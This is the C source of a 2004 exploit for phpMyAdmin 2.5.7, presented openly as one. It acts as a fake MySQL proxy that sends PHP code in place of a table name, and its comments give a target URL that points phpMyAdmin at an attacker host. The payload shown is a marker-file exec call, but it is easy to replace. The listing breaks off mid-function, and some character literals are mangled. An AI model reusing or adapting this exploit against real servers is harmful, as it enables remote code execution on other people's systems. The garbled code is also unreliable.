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- /*
- * p257rcie.c
- * written by Nasir Simbolon <nasir kecapi com>
- * eagle kecapi com
- * Jakarta, Indonesia
- *
- * June, 10 2004
- *
- * A phpMyAdmin-2.5.7 exploite program.
- * This is a kind of mysql server wrapper acts like a proxy except that it will sends a fake table name,
- * when client query "SHOW TABLES", by replacing the real table name with a string contains exploite codes.
- *
- * Compile : gcc p257rcie.c -o p257rcie.c
- *
- * run with
- * ./p257rcie
- *
- * and go to your target and put
- *
- * http://target/phpMyAdmin-2.5.7/left.php?server=4&cfg[Servers][4][host]=
- * attacker.host.com&cfg[Servers][4][port]=8889&cfg[Servers][4][auth_type]=config&cfg[Servers]
- * [4][user]=user&cfg[Servers][4][password]=pass&cfg[Servers][4][connect_type]=tcp&&cfg[Servers]
- * [4][only_db]=databasename
- *
- * fill host,port,user,pass and databasename correctly
- *
- */
- #include<stdio.h>
- #include<sys/socket.h>
- #include<netdb.h>
- #define BIND_PORT 8889
- #define MYSQL_PORT 3306
- #define HOSTNAME "localhost"
- #define DATABASE "phpmy"
- #define BUFFER_LEN 1024
- /* This is php code we want to inject into phpMyAdmin
- Do NOT use single quote (') in the string, use double quote (") instead
- */
- char *phpcodes = "exec("touch /tmp/your-phpmyadmin-is-vulnerable");";
- /* This is examples codes I captured when mysql server
- reply to client's request of query "SHOW TABLES" query.
- It shows database name 'phpmy' and contain one tablename 'mytable'
- Our aim is to manipulate the data received from mysql server
- by replacing 'mytable' with our exploide codes.
- 0x1 ,0x0 ,0x0 ,0x1 ,0x1 ,0x1b,0x0 ,0x0 ,0x2 ,0x0 ,
- 0xf ,'T' ,'a' ,'b' ,'l' ,'e' ,'s' ,'_' ,'i' ,'n' ,
- '_' ,'p' ,'h' ,'p' ,'m' ,'y' ,0x3 ,0x40,0x0 ,0x0 ,
- 0x1 ,-2 ,0x3 ,0x1 ,0x0 ,0x1f,0x1 ,0x0 ,0x0 ,0x3 ,
- -2 ,8 ,0x0 ,0x0 ,0x4 ,7 ,'m' ,'y' ,'t' ,'a' ,
- 'b' ,'l' ,'e' ,0x1 ,0 ,0 ,0x5 ,-2
- */
- int build_exploite_code(char* dbname,char* phpcodes,char** expcode)
- {
- char my1[21] = {0x1 ,0x0 ,0x0 ,0x1 ,0x1 ,0x1b,0x0 ,0x0 ,0x2 ,0x0 ,
- 0xf ,'T' ,'a' ,'b' ,'l' ,'e' ,'s' ,'_' ,'i' ,'n' ,
- '_'};
- /* part of dbname ('p' ,'h' ,'p' ,'m' ,'y') */
- char my2[15] = {0x3 ,0x40,0x0 ,0x0 ,0x1 ,-2 ,0x3 ,0x1 ,0x0 ,0x1f,
- 0x1 ,0x0 ,0x0 ,0x3 ,-2};
- /* part of int phpcodes string length +1 (8) */
- char my3[3] = {0x0 ,0x0 ,0x4};
- /* part of int phpcodes string length (7) */
- /* part of tablename ('m' ,'y' ,'t' ,'a' ,'b' ,'l' ,'e' ) */
- char my4[5] = {0x1 ,0 ,0 ,0x5 ,-2};
- int len,i;
- len = 21 + strlen(dbname) + 15 + 1 + 3 + 1 + strlen(phpcodes) + 5 + 5;
- *expcode = (char*) malloc(sizeof(char) * len);
- i = 0;
- bcopy(&my1[0],*expcode + i,21);
- i += 21;
- bcopy(dbname, *expcode + i,strlen(dbname));
- i += strlen(dbname);
- bcopy(&my2[0],*expcode + i,15);
- i += 15;
- (*expcode)[i] = 5 + strlen(phpcodes) + 1;
- i ++;
- bcopy(&my3[0],*expcode + i,3);
- i += 3;
- (*expcode)[i++] = 5 + strlen(phpcodes) ;
- /* this is our exploite codes*/
- (*expcode)[i++] = '';
- (*expcode)[i++] = ''';
- (*expcode)[i++] = ';';
- bcopy(phpcodes,*expcode + i,strlen(phpcodes));
- i += strlen(phpcodes);
- (*expcode)[i++] = '/';
- (*expcode)[i++] = '*';
- bcopy(&my4[0],*expcode + i,5);
- return len;
- }
- /* connect to mysql server*/
- int connect_mysql()
- {
- int s2;
- struct sockaddr_in ina;
- struct hostent *h;
- h = gethostbyname(HOSTNAME);
- /* set internet address */
- bcopy(h->h_addr,(void *)&ina.sin_addr,h->h_length);
- ina.sin_family = AF_INET;
- ina.sin_port = htons(MYSQL_PORT);
- //ina.sin_zero[0]='